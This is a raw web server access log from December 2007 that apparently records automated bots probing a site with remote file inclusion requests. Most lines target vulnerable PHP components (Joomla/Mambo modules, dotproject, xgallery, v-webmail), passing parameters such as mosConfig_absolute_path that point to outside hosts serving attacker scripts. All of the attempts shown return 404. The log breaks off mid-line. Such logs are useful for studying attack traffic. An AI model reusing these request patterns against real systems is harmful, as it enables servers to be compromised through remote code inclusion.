209.200.57.200 - - [02/Dec/2007:21:17:11 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:17:12 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.6.22.173 - - [02/Dec/2007:21:19:14 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:21:20:10 -0800] "GET ////////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:21:20:54 -0800] "GET /logs/access_071112.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:21:20:54 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:21:20:55 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:21:59 -0800] "GET /logs/access_071015.log/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:22:00 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:22:00 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:21:22:03 -0800] "GET /oneadmin/adminfoot.php?path%5Bdocroot%5D=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:21:22:26 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:21:22:29 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:24:14 -0800] "GET /logs/access_071022.log/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
209.200.57.200 - - [02/Dec/2007:21:26:11 -0800] "GET /dotproject/modules/files/index_table.php?root_dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:26:12 -0800] "GET /dotproject/modules/files/index_table.php?root_dir=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:21:28:44 -0800] "GET /logs/access_070903.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:30:16 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:30:16 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:30:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:30:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:21:34:40 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.32.78.122 - - [02/Dec/2007:21:34:40 -0800] "GET /logs/access_070806.log//v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:21:34:41 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basep